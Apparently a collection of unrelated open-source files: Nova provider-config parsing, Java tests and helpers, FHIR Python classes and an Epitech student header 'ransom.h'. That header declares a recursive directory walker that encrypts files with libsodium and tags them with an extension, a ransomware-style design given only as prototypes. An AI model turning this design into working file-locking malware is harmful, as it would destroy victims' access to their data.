                                        'type': 'integer'
                                    },
                                    'step_size': {
                                        'type': 'integer'
                                    },
                                    'allocation_ratio': {
                                        'type': 'number'
                                    }
                                },
                                'required': ['total'],
                                # The defined properties reflect the current
                                # placement data model. While defining those
                                # in the schema and not allowing additional
                                # properties means we will need to bump the
                                # schema version if they change, that is likely
                                # to be part of a large change that may have
                                # other impacts anyway. The benefit of stricter
                                # validation of property names outweighs the
                                # (small) chance of having to bump the schema
                                # version as described above.
                                'additionalProperties': False
                            }
                        },
                        # This ensures only keys matching the pattern
                        # above are allowed.
                        'additionalProperties': False
                    }
                }
            },
            'additionalProperties': True
        },
        'providerTraits': {
            # Allows the admin to specify various adjectives to create and
            # manage providers' traits. This list of adjectives can be extended
            # in the future as the schema evolves to meet new use cases.
            # As of v1.0, only one adjective, `additional`, is supported.
            'type': 'object',
            'properties': {
                'additional': {
                    'type': 'array',
                    'items': {
                        # Allows any value matching the trait pattern here,
                        # additional validation will be done after schema
                        # validation.
                        'type': 'string',
                        'pattern': '^[A-Z0-9_]{1,255}$'
                    }
                }
            },
            'additionalProperties': True
        }
    }
}
def _load_yaml_file(path):
    """Loads and parses a provider.yaml config file into a dict.

    :param path: Path to the yaml file to load.
    :return: Dict representing the yaml file requested.
    :raise: ProviderConfigException if the path provided cannot be read
        or the file is not valid yaml.
    """
    try:
        with open(path) as open_file:
            try:
                return yaml.safe_load(open_file)
            except yaml.YAMLError as ex:
                # Assemble the parse-failure message, appending the exact
                # file position when the parser provides one.
                details = [_("Unable to load yaml file: %s ") % ex]
                if hasattr(ex, 'problem_mark'):
                    pos = ex.problem_mark
                    details.append(_("File: %s ") % open_file.name)
                    details.append(_("Error position: (%s:%s)") % (
                        pos.line + 1, pos.column + 1))
                raise nova_exc.ProviderConfigException(
                    error=''.join(details))
    except OSError:
        raise nova_exc.ProviderConfigException(
            error=_("Unable to read yaml config file: %s") % path)
def _validate_provider_config(config, provider_config_path):
    """Accepts a schema-verified provider config in the form of a dict and
    performs additional checks for format and required keys.

    :param config: Dict containing a provider config file
    :param provider_config_path: Path to the provider config, used for logging
    :return: List of valid providers
    :raise nova.exception.ProviderConfigException: If provider id is missing,
        or a resource class or trait name is invalid.
    """
    def _validate_traits(provider):
        # Check that traits are custom; standard os-traits names may not be
        # overridden from a provider config file.
        additional_traits = set(provider.get("traits", {}).get(
            "additional", []))
        trait_conflicts = [trait for trait in additional_traits
                           if not os_traits.is_custom(trait)]
        if trait_conflicts:
            # sort for more predictable message for testing
            message = _(
                "Invalid traits, only custom traits are allowed: %s"
            ) % sorted(trait_conflicts)
            raise nova_exc.ProviderConfigException(error=message)
        return additional_traits

    def _validate_rc(provider):
        # Check that resource classes are custom; standard resource classes
        # may not be overridden from a provider config file.
        additional_inventories = provider.get("inventories", {}).get(
            "additional", [])
        all_inventory_conflicts = []
        for inventory in additional_inventories:
            inventory_conflicts = [rc for rc in inventory
                                   if not os_resource_classes.is_custom(rc)]
            all_inventory_conflicts += inventory_conflicts
        if all_inventory_conflicts:
            # sort for more predictable message for testing
            message = _(
                "Invalid resource class, only custom resource classes "
                "are allowed: %s") % ', '.join(sorted(all_inventory_conflicts))
            raise nova_exc.ProviderConfigException(error=message)
        return additional_inventories

    # store valid providers
    valid_providers = []
    for provider in config.get("providers", []):
        # Check that the identification method is known since
        # the schema only requires that some property be present
        pid = provider["identification"]
        provider_id = pid.get("name") or pid.get("uuid")
        # Not checking the validity of provider_id since
        # the schema has already ensured that.
        additional_traits = _validate_traits(provider)
        additional_inventories = _validate_rc(provider)
        # filter out no-op providers so they will not be returned
        if not additional_traits and not additional_inventories:
            message = (
                "Provider %(provider_id)s defined in %(provider_config_path)s "
                "has no additional inventories or traits and will be ignored."
            ) % {
                "provider_id": provider_id,
                "provider_config_path": provider_config_path
            }
            LOG.warning(message)
        else:
            valid_providers.append(provider)
    return valid_providers
def _parse_provider_yaml(path):
    """Loads schema, parses a provider.yaml file and validates the content.

    :param path: File system path to the file to parse.
    :return: dict representing the contents of the file.
    :raise ProviderConfigException: If the specified file does
        not validate against the schema, the schema version is not supported,
        or if unable to read configuration or schema files.
    """
    yaml_file = _load_yaml_file(path)
    try:
        schema_version = microversion_parse.parse_version_string(
            yaml_file['meta']['schema_version'])
    except (KeyError, TypeError):
        # KeyError: 'meta' or 'schema_version' missing.
        # TypeError: the document is not a mapping at all.
        message = _("Unable to detect schema version: %s") % yaml_file
        raise nova_exc.ProviderConfigException(error=message)
    # An unknown major version is a hard failure ...
    if schema_version.major not in SUPPORTED_SCHEMA_VERSIONS:
        message = _(
            "Unsupported schema major version: %d") % schema_version.major
        raise nova_exc.ProviderConfigException(error=message)
    # ... but a newer minor within a supported major is only a warning,
    # since minor bumps are backward compatible by definition.
    if schema_version.minor not in \
            SUPPORTED_SCHEMA_VERSIONS[schema_version.major]:
        # TODO(sean-k-mooney): We should try to provide a better
        # message that identifies which fields may be ignored
        # and the max minor version supported by this version of nova.
        message = (
            "Provider config file [%(path)s] is at schema version "
            "%(schema_version)s. Nova supports the major version, "
            "but not the minor. Some fields may be ignored."
            % {"path": path, "schema_version": schema_version})
        LOG.warning(message)
    try:
        jsonschema.validate(yaml_file, SCHEMA_V1)
    except jsonschema.exceptions.ValidationError as e:
        message = _(
            "The provider config file %(path)s did not pass validation "
            "for schema version %(schema_version)s: %(reason)s") % {
            "path": path, "schema_version": schema_version, "reason": e}
        raise nova_exc.ProviderConfigException(error=message)
    return yaml_file
def get_provider_configs(provider_config_dir):
    """Gathers files in the provided path and calls the parser for each file
    and merges them into a list while checking for a number of possible
    conflicts.

    :param provider_config_dir: Path to a directory containing provider config
        files to be loaded.
    :raise nova.exception.ProviderConfigException: If unable to read provider
        config directory or if one of a number of validation checks fail:
        - Unknown, unsupported, or missing schema major version.
        - Unknown, unsupported, or missing resource provider identification.
        - A specific resource provider is identified twice with the same
          method. If the same provider identified by *different* methods,
          such conflict will be detected in a later stage.
        - A resource class or trait name is invalid or not custom.
        - A general schema validation error occurs (required fields,
          types, etc).
    :return: A dict of dicts keyed by uuid_or_name with the parsed and
        validated contents of all files in the provided dir. Each value in the
        dict will include the source file name in the value of the
        __source_file key.
    """
    provider_configs = {}
    provider_config_paths = glob.glob(
        os.path.join(provider_config_dir, "*.yaml"))
    # Sort so files are processed in a deterministic order regardless of
    # filesystem listing order.
    provider_config_paths.sort()
    if not provider_config_paths:
        message = (
            "No provider configs found in %s. If files are present, "
            "ensure the Nova process has access."
        )
        LOG.info(message, provider_config_dir)
        # return an empty dict as no provider configs found
        return provider_configs
    for provider_config_path in provider_config_paths:
        provider_config = _parse_provider_yaml(provider_config_path)
        for provider in _validate_provider_config(
            provider_config, provider_config_path,
        ):
            # Record which file this provider came from so duplicate
            # definitions can report the offending sources.
            provider['__source_file'] = os.path.basename(provider_config_path)
            pid = provider["identification"]
            uuid_or_name = pid.get("uuid") or pid.get("name")
            # raise exception if this provider was already processed
            if uuid_or_name in provider_configs:
                raise nova_exc.ProviderConfigException(
                    error=_(
                        "Provider %(provider_id)s has multiple definitions "
                        "in source file(s): %(source_files)s."
                    ) % {
                        "provider_id": uuid_or_name,
                        # sorted set for deduplication and consistent order
                        "source_files": sorted({
                            provider_configs[uuid_or_name]["__source_file"],
                            provider_config_path
                        })
                    }
                )
            provider_configs[uuid_or_name] = provider
    return provider_configs
| 8,910 |
313 | /*
* Copyright 2018 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.common.util.rx;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.Supplier;
import com.jayway.awaitility.Awaitility;
import org.junit.Test;
import rx.Producer;
import rx.Subscriber;
import rx.Subscription;
import static org.assertj.core.api.Assertions.assertThat;
public class ValueGeneratorTest {

    @Test
    public void testSimpleValueGeneration() throws Exception {
        final int limit = 100;
        AtomicInteger valueSource = new AtomicInteger();
        AtomicInteger emitCounter = new AtomicInteger();
        CountDownLatch latch = new CountDownLatch(1);
        // Subscribe with explicit backpressure: request exactly one item at a
        // time, and stop by unsubscribing once 'limit' items were emitted.
        Subscription subscription = ObservableExt.generatorFrom(valueSource::getAndIncrement).subscribe(new Subscriber<Integer>() {
            private Producer producer;

            @Override
            public void setProducer(Producer p) {
                this.producer = p;
                // Kick off the stream by requesting the first value.
                p.request(1);
            }

            @Override
            public void onCompleted() {
                latch.countDown();
            }

            @Override
            public void onError(Throwable e) {
                latch.countDown();
                e.printStackTrace();
            }

            @Override
            public void onNext(Integer integer) {
                if (emitCounter.incrementAndGet() < limit) {
                    // Keep pulling one value per emission.
                    producer.request(1);
                } else {
                    // Reached the limit: stop the generator and release the test.
                    unsubscribe();
                    latch.countDown();
                }
            }
        });
        latch.await();
        assertThat(emitCounter.get()).isEqualTo(limit);
        // Unsubscription may take effect asynchronously; wait for it.
        Awaitility.await().timeout(5, TimeUnit.SECONDS).until(subscription::isUnsubscribed);
    }

    @Test
    public void testFailureInValueProviderIsPropagatedToSubscriber() throws Exception {
        // A supplier that always fails; the failure should surface via onError.
        Supplier<Integer> failingSupplier = () -> {
            throw new RuntimeException("simulated error");
        };
        AtomicReference<Throwable> errorRef = new AtomicReference<>();
        CountDownLatch latch = new CountDownLatch(1);
        Subscription subscription = ObservableExt.generatorFrom(failingSupplier).subscribe(new Subscriber<Integer>() {
            @Override
            public void setProducer(Producer p) {
                p.request(1);
            }

            @Override
            public void onCompleted() {
                latch.countDown();
            }

            @Override
            public void onError(Throwable e) {
                // Capture the propagated failure for the assertion below.
                errorRef.set(e);
                latch.countDown();
            }

            @Override
            public void onNext(Integer integer) {
            }
        });
        latch.await();
        Awaitility.await().timeout(5, TimeUnit.SECONDS).until(subscription::isUnsubscribed);
        assertThat(errorRef.get()).hasMessageContaining("simulated error");
    }
}
818 | /*
* Copyright 2021 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jbpm.process.instance.impl.humantask;
import java.io.Serializable;
import java.nio.file.Paths;
import java.util.Date;
import java.util.Map;
import java.util.UUID;
import org.jbpm.workflow.instance.node.WorkItemNodeInstance;
import org.kie.kogito.MapOutput;
import org.kie.kogito.internal.process.runtime.KogitoNodeInstance;
import org.kie.kogito.internal.process.runtime.KogitoWorkItem;
import org.kie.kogito.internal.process.runtime.WorkItemNotFoundException;
import org.kie.kogito.process.ProcessInstance;
import org.kie.kogito.process.workitem.Attachment;
import org.kie.kogito.process.workitem.AttachmentInfo;
import org.kie.kogito.process.workitem.Comment;
import org.kie.kogito.process.workitem.HumanTaskWorkItem;
import org.kie.kogito.process.workitem.Policy;
import org.kie.kogito.process.workitem.TaskMetaEntity;
public class HumanTaskHelper {

    private HumanTaskHelper() {
        // Utility class; no instances.
    }

    /**
     * Narrows a generic work item to its human-task implementation.
     *
     * @param item work item expected to be a human task
     * @return the same item cast to {@link HumanTaskWorkItemImpl}
     * @throws IllegalArgumentException if the item is not a human task
     */
    public static HumanTaskWorkItemImpl asHumanTask(KogitoWorkItem item) {
        if (item instanceof HumanTaskWorkItemImpl) {
            return (HumanTaskWorkItemImpl) item;
        } else {
            throw new IllegalArgumentException("Work item " + item.getStringId() + " is not a human task");
        }
    }

    /**
     * Adds a new comment to a human task.
     *
     * @param item the human task work item
     * @param commentInfo the comment text
     * @param user the user adding the comment
     * @return the newly created comment (with a generated id)
     */
    public static Comment addComment(KogitoWorkItem item, String commentInfo, String user) {
        HumanTaskWorkItemImpl humanTask = asHumanTask(item);
        Object id = getNewId();
        Comment comment = buildComment(id, commentInfo, user);
        humanTask.getComments().put(id, comment);
        return comment;
    }

    /**
     * Adds a new attachment to a human task.
     *
     * @param item the human task work item
     * @param attachmentInfo the attachment URI and optional name
     * @param user the user adding the attachment
     * @return the newly created attachment (with a generated id)
     */
    public static Attachment addAttachment(KogitoWorkItem item, AttachmentInfo attachmentInfo, String user) {
        HumanTaskWorkItemImpl humanTask = asHumanTask(item);
        Object id = getNewId();
        Attachment attachment = buildAttachment(id, attachmentInfo, user);
        humanTask.getAttachments().put(id, attachment);
        return attachment;
    }

    /**
     * Replaces the text of an existing comment.
     *
     * @param item the human task work item
     * @param id the id of the comment to update
     * @param commentInfo the new comment text
     * @param user the user requesting the update
     * @return the updated comment
     * @throws IllegalArgumentException if the comment does not exist or
     *         the user does not own it
     */
    public static Comment updateComment(KogitoWorkItem item, Object id, String commentInfo, String user) {
        Comment comment = asHumanTask(item).getComments().get(id);
        if (comment == null) {
            throw new IllegalArgumentException("Comment " + id + " does not exist");
        }
        // NOTE(review): ownership is checked against getUpdatedBy(), not the
        // original author — confirm this is the intended semantics.
        if (!comment.getUpdatedBy().equals(user)) {
            throw new IllegalArgumentException("User " + user + " did not create the comment, cannot modify it");
        }
        return fillTaskMetaEntity(comment, commentInfo);
    }

    /**
     * Replaces an existing attachment's URI and name.
     *
     * @param item the human task work item
     * @param id the id of the attachment to update
     * @param attachmentInfo the new attachment URI and optional name
     * @param user the user requesting the update
     * @return the updated attachment
     * @throws IllegalArgumentException if the attachment does not exist or
     *         the user does not own it
     */
    public static Attachment updateAttachment(KogitoWorkItem item,
            Object id,
            AttachmentInfo attachmentInfo,
            String user) {
        Attachment attachment = asHumanTask(item).getAttachments().get(id);
        if (attachment == null) {
            throw new IllegalArgumentException("Attachment " + id + " does not exist");
        }
        // NOTE(review): same getUpdatedBy()-based ownership check as comments.
        if (!attachment.getUpdatedBy().equals(user)) {
            throw new IllegalArgumentException("User " + user + " did not create the attachment, cannot modify it");
        }
        return setAttachmentName(fillTaskMetaEntity(attachment, attachmentInfo.getUri()), attachmentInfo);
    }

    /**
     * Overwrites the task output (results) with the given model.
     *
     * @param item the human task work item
     * @param model source of the new output values
     * @return the task's results map after the update
     */
    public static Map<String, Object> updateContent(KogitoWorkItem item, MapOutput model) {
        HumanTaskWorkItemImpl humanTask = asHumanTask(item);
        humanTask.setResults(model.toMap());
        return humanTask.getResults();
    }

    /**
     * Removes a comment if it exists and is owned by the given user.
     *
     * @return true if the comment was removed, false otherwise
     */
    public static boolean deleteComment(KogitoWorkItem item, Object id, String user) {
        Map<Object, Comment> comments = asHumanTask(item).getComments();
        Comment comment = comments.get(id);
        if (comment == null || !comment.getUpdatedBy().equals(user)) {
            return false;
        }
        return comments.remove(id) != null;
    }

    /**
     * Removes an attachment if it exists and is owned by the given user.
     *
     * @return true if the attachment was removed, false otherwise
     */
    public static boolean deleteAttachment(KogitoWorkItem item, Object id, String user) {
        Map<Object, Attachment> attachments = asHumanTask(item).getAttachments();
        Attachment attachment = attachments.get(id);
        if (attachment == null || !attachment.getUpdatedBy().equals(user)) {
            return false;
        }
        return attachments.remove(id) != null;
    }

    /**
     * Locates the human task with the given id inside a process instance.
     *
     * @param pi the process instance to search
     * @param taskId the work item id of the task
     * @param policies security policies the work item must satisfy
     * @return the matching human task work item
     * @throws WorkItemNotFoundException if no matching task is found
     */
    public static HumanTaskWorkItem findTask(ProcessInstance<?> pi, String taskId, Policy<?>... policies) {
        return pi.findNodes(ni -> isSearchWorkItem(ni, taskId,
                policies)).stream().findFirst().map(wi -> (HumanTaskWorkItem) ((WorkItemNodeInstance) wi).getWorkItem())
                .orElseThrow(() -> new WorkItemNotFoundException(taskId));
    }

    // Predicate used by findTask: node must be a work item node holding a
    // human task with the requested id that satisfies the given policies.
    private static boolean isSearchWorkItem(KogitoNodeInstance ni, String taskId, Policy<?>... policies) {
        return ni instanceof WorkItemNodeInstance && ((WorkItemNodeInstance) ni).getWorkItemId().equals(
                taskId) && ((WorkItemNodeInstance) ni).getWorkItem().enforce(policies) &&
                ((WorkItemNodeInstance) ni).getWorkItem() instanceof HumanTaskWorkItem;
    }

    // Creates a comment with the given id/user and stamps content + timestamp.
    private static Comment buildComment(Object id, String content, String user) {
        return fillTaskMetaEntity(new Comment(id, user), content);
    }

    // Creates an attachment with the given id/user, stamps the URI and
    // resolves its display name.
    private static Attachment buildAttachment(Object id, AttachmentInfo attachmentInfo, String user) {
        return setAttachmentName(fillTaskMetaEntity(new Attachment(id, user), attachmentInfo.getUri()), attachmentInfo);
    }

    // Uses the explicit name when given, otherwise falls back to the last
    // path segment of the attachment URI.
    private static Attachment setAttachmentName(Attachment attachment, AttachmentInfo attachmentInfo) {
        String name = attachmentInfo.getName();
        if (name == null) {
            name = Paths.get(attachmentInfo.getUri()).getFileName().toString();
        }
        attachment.setName(name);
        return attachment;
    }

    // Sets the content and refreshes the updated-at timestamp on any task
    // meta entity (comment or attachment).
    private static <T extends Serializable, C extends TaskMetaEntity<T>> C fillTaskMetaEntity(C metaInfo,
            T content) {
        metaInfo.setUpdatedAt(new Date());
        metaInfo.setContent(content);
        return metaInfo;
    }

    // Random UUID string used as id for new comments/attachments.
    private static Object getNewId() {
        return UUID.randomUUID().toString();
    }
}
| 2,336 |
333 | /*
** EPITECH PROJECT, 2021
** RANSOM_H_
** File description:
** ransom
*/
#ifndef RANSOM_H_
#define RANSOM_H_

/*
** Standard library / system headers (each included exactly once — the
** original listed dirent.h, sodium.h, stdio.h, stdlib.h and unistd.h twice).
*/
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <pwd.h>
#include <sys/types.h>

/* libsodium: secretstream (XChaCha20-Poly1305) + password hashing. */
#include <sodium.h>
#include <sodium/crypto_pwhash.h>
#include <sodium/crypto_secretstream_xchacha20poly1305.h>
#include <sodium/utils.h>

#define MAX_FILEPATH 256
#define MAX_KEY_LEN crypto_secretstream_xchacha20poly1305_KEYBYTES
#define SALT_LEN crypto_pwhash_SALTBYTES
#define CHUNK_SIZE 4096

/* Indices into the cryptalgo[] dispatch table below. */
#define ENCRYPT (0)
#define DECRYPT (1)

typedef struct cryptalgo_s cryptalgo_t;

/*
** Table-driven crypto operation: each direction (encrypt/decrypt) provides
** its own filename mangling, skip predicate, stream setup, header handling
** and processing loop.
*/
struct cryptalgo_s {
    void (*format_filename)(const char *filename, char *new_filename);
    bool (*skip_paths)(const char *path);
    bool (*init_cryptalgo)(FILE **f1, FILE **f2, const char *oldfilename, const char *new_filename);
    int (*manage_header)(unsigned char *generated_key, FILE **f1, FILE **f2,
        crypto_secretstream_xchacha20poly1305_state *st);
    int (*loop)(FILE *f1, FILE *f2, crypto_secretstream_xchacha20poly1305_state st);
};

// algo.c
int core(const char *password,
    const char *filepath, const char *optfilepath, cryptalgo_t algo);
int graceful_exit(FILE *f1, FILE *f2, unsigned char *generated_key, int ret);

// encryption.c
bool init_encryption(FILE **to_encrypt, FILE **encrypted,
    const char *filepath, const char *optfilepath);
int write_header(unsigned char *generated_key, FILE **to_encrypt,
    FILE **encrypted, crypto_secretstream_xchacha20poly1305_state *st);
int encryption_loop(FILE *to_encrypt, FILE *encrypted,
    crypto_secretstream_xchacha20poly1305_state st);

// decryption.c
bool init_decryption(FILE **to_decrypt, FILE **decrypted,
    const char *filepath, const char *optfilepath);
int read_header(unsigned char *generated_key,
    FILE **to_decrypt, FILE **decrypted, crypto_secretstream_xchacha20poly1305_state *st);
int decryption_loop(FILE *to_decrypt, FILE *decrypted,
    crypto_secretstream_xchacha20poly1305_state st);

// ransom.c
bool skip_already_decrypted(const char *path);
bool skip_already_encrypted(const char *path);
int iter_recursively_through_files(char *path, char *password,
    cryptalgo_t);
void get_new_path_name(char *parentPath, char *finalPath, char *currentPath);
void add_file_extension(const char *fileName, char *optFileName);
void remove_file_extension(const char *filename, char *optfilename);

/*
** NOTE(review): `static const` in a header gives every translation unit its
** own copy of this table; harmless here, but a single extern definition in
** one .c file would avoid the duplication.
*/
static const cryptalgo_t cryptalgo[] = {
    [ENCRYPT] = {
        add_file_extension,
        skip_already_encrypted,
        init_encryption,
        write_header,
        encryption_loop
    },
    [DECRYPT] = {
        remove_file_extension,
        skip_already_decrypted,
        init_decryption,
        read_header,
        decryption_loop
    },
};

#endif /* RANSOM_H_ */
| 1,144 |
474 | package com.thinkkeep.videolib.di.component;
import android.content.Context;
import com.thinkkeep.videolib.api.EvilsLiveStreamer;
import com.thinkkeep.videolib.di.modules.CameraModule;
import dagger.Component;
/**
 * Dagger component that wires camera dependencies (provided by
 * {@link CameraModule}) into streaming entry points.
 *
 * Created by jason on 17/2/27.
 */
@Component(modules = CameraModule.class)
public interface CameraComponent {

    /** Injects camera-related dependencies into the given streamer. */
    void inject(EvilsLiveStreamer streamer);

    final class Initializer {
        private Initializer() {
        } // No instance

        /**
         * Builds the component from the generated Dagger builder, binding
         * the given Context through a new CameraModule.
         */
        public static CameraComponent init(Context context) {
            return DaggerCameraComponent.builder()
                    .cameraModule(new CameraModule(context)).build();
        }
    }
}
| 239 |
3,212 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.distributed.cache.client;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Set;
/**
 * Helpers that turn values into byte arrays, keeping serialization concerns
 * out of the network byte stream code.
 */
public class CacheClientSerde {

    /**
     * Serialize a single value of the given type.
     *
     * @param value the value to be serialized
     * @param serializer the serializer for the input value
     * @param <T> the value type
     * @return the byte stream representation of the input value
     * @throws IOException on serialization failure
     */
    public static <T> byte[] serialize(final T value, final Serializer<T> serializer) throws IOException {
        final ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        serializer.serialize(value, buffer);
        return buffer.toByteArray();
    }

    /**
     * Serialize a collection of values of the given type.
     *
     * @param values the values to be serialized
     * @param serializer the serializer for the input values
     * @param <T> the value type
     * @return a collection of the byte stream representations of the input values
     * @throws IOException on serialization failure
     */
    public static <T> Collection<byte[]> serialize(final Set<T> values, final Serializer<T> serializer) throws IOException {
        final Collection<byte[]> serialized = new ArrayList<>();
        for (final T value : values) {
            // Delegate to the single-value overload; each element gets its
            // own backing buffer, yielding identical byte arrays.
            serialized.add(serialize(value, serializer));
        }
        return serialized;
    }
}
| 804 |
418 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/SubstanceNucleicAcid) on 2019-05-07.
# 2019, SMART Health IT.
from . import domainresource
class SubstanceNucleicAcid(domainresource.DomainResource):
    """ Nucleic acids are defined by three distinct elements: the base, sugar and
    linkage. Individual substance/moiety IDs will be created for each of these
    elements. The nucleotide sequence will be always entered in the 5’-3’
    direction.
    """

    resource_type = "SubstanceNucleicAcid"

    def __init__(self, jsondict=None, strict=True):
        """ Initialize all valid properties.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """

        self.areaOfHybridisation = None
        """ The area of hybridisation shall be described if applicable for
        double stranded RNA or DNA. The number associated with the subunit
        followed by the number associated to the residue shall be specified
        in increasing order. The underscore “” shall be used as separator
        as follows: “Subunitnumber Residue”.
        Type `str`. """

        self.numberOfSubunits = None
        """ The number of linear sequences of nucleotides linked through
        phosphodiester bonds shall be described. Subunits would be strands
        of nucleic acids that are tightly associated typically through
        Watson-Crick base pairing. NOTE: If not specified in the reference
        source, the assumption is that there is 1 subunit.
        Type `int`. """

        self.oligoNucleotideType = None
        """ (TBC).
        Type `CodeableConcept` (represented as `dict` in JSON). """

        self.sequenceType = None
        """ The type of the sequence shall be specified based on a controlled
        vocabulary.
        Type `CodeableConcept` (represented as `dict` in JSON). """

        self.subunit = None
        """ Subunits are listed in order of decreasing length; sequences of the
        same length will be ordered by molecular weight; subunits that have
        identical sequences will be repeated multiple times.
        List of `SubstanceNucleicAcidSubunit` items (represented as `dict` in JSON). """

        super(SubstanceNucleicAcid, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        # Each tuple: (name, json_name, type, is_list, of_many, not_optional).
        # NOTE(review): `codeableconcept` is presumably imported elsewhere in
        # this generated module (not visible here) — confirm.
        js = super(SubstanceNucleicAcid, self).elementProperties()
        js.extend([
            ("areaOfHybridisation", "areaOfHybridisation", str, False, None, False),
            ("numberOfSubunits", "numberOfSubunits", int, False, None, False),
            ("oligoNucleotideType", "oligoNucleotideType", codeableconcept.CodeableConcept, False, None, False),
            ("sequenceType", "sequenceType", codeableconcept.CodeableConcept, False, None, False),
            ("subunit", "subunit", SubstanceNucleicAcidSubunit, True, None, False),
        ])
        return js
from . import backboneelement
class SubstanceNucleicAcidSubunit(backboneelement.BackboneElement):
""" Subunits are listed in order of decreasing length; sequences of the same
length will be ordered by molecular weight; subunits that have identical
sequences will be repeated multiple times.
"""
resource_type = "SubstanceNucleicAcidSubunit"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.fivePrime = None
""" The nucleotide present at the 5’ terminal shall be specified based
on a controlled vocabulary. Since the sequence is represented from
the 5' to the 3' end, the 5’ prime nucleotide is the letter at the
first position in the sequence. A separate representation would be
redundant.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.length = None
""" The length of the sequence shall be captured.
Type `int`. """
self.linkage = None
""" The linkages between sugar residues will also be captured.
List of `SubstanceNucleicAcidSubunitLinkage` items (represented as `dict` in JSON). """
self.sequence = None
""" Actual nucleotide sequence notation from 5' to 3' end using
standard single letter codes. In addition to the base sequence,
sugar and type of phosphate or non-phosphate linkage should also be
captured.
Type `str`. """
self.sequenceAttachment = None
""" (TBC).
Type `Attachment` (represented as `dict` in JSON). """
self.subunit = None
""" Index of linear sequences of nucleic acids in order of decreasing
length. Sequences of the same length will be ordered by molecular
weight. Subunits that have identical sequences will be repeated and
have sequential subscripts.
Type `int`. """
self.sugar = None
""" 5.3.6.8.1 Sugar ID (Mandatory).
List of `SubstanceNucleicAcidSubunitSugar` items (represented as `dict` in JSON). """
self.threePrime = None
""" The nucleotide present at the 3’ terminal shall be specified based
on a controlled vocabulary. Since the sequence is represented from
the 5' to the 3' end, the 5’ prime nucleotide is the letter at the
last position in the sequence. A separate representation would be
redundant.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(SubstanceNucleicAcidSubunit, self).__init__(jsondict=jsondict, strict=strict)
    def elementProperties(self):
        """Return the property metadata used for JSON (de)serialization.

        Extends the base class's list with this resource's own fields.
        Each tuple is: (attribute name, JSON name, type, is_list,
        "of many" group, not_optional).
        """
        js = super(SubstanceNucleicAcidSubunit, self).elementProperties()
        js.extend([
            ("fivePrime", "fivePrime", codeableconcept.CodeableConcept, False, None, False),
            ("length", "length", int, False, None, False),
            ("linkage", "linkage", SubstanceNucleicAcidSubunitLinkage, True, None, False),
            ("sequence", "sequence", str, False, None, False),
            ("sequenceAttachment", "sequenceAttachment", attachment.Attachment, False, None, False),
            ("subunit", "subunit", int, False, None, False),
            ("sugar", "sugar", SubstanceNucleicAcidSubunitSugar, True, None, False),
            ("threePrime", "threePrime", codeableconcept.CodeableConcept, False, None, False),
        ])
        return js
class SubstanceNucleicAcidSubunitLinkage(backboneelement.BackboneElement):
    """The linkage between sugar residues of a nucleic acid subunit."""

    resource_type = "SubstanceNucleicAcidSubunitLinkage"

    def __init__(self, jsondict=None, strict=True):
        """Set every supported property to its empty default, then let the
        base class populate the instance from ``jsondict``.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """
        # The entity that links the sugar residues together; for nearly all
        # naturally occurring nucleic acids this is a phosphate group, while
        # synthetic oligonucleotides often use phosphorothioate linkages.
        # Connectivity is assumed 3'-5'; 3'-3' or 5'-5' must be stated.
        # Type `str`.
        self.connectivity = None

        # Each linkage is registered as a fragment and has an ID.
        # Type `Identifier` (represented as `dict` in JSON).
        self.identifier = None

        # The single name assigned to this linkage fragment.
        # Type `str`.
        self.name = None

        # Residues captured as described in 5.3.6.8.3.
        # Type `str`.
        self.residueSite = None

        super(SubstanceNucleicAcidSubunitLinkage, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        """Return property metadata tuples for JSON (de)serialization."""
        properties = super(SubstanceNucleicAcidSubunitLinkage, self).elementProperties()
        properties += [
            ("connectivity", "connectivity", str, False, None, False),
            ("identifier", "identifier", identifier.Identifier, False, None, False),
            ("name", "name", str, False, None, False),
            ("residueSite", "residueSite", str, False, None, False),
        ]
        return properties
class SubstanceNucleicAcidSubunitSugar(backboneelement.BackboneElement):
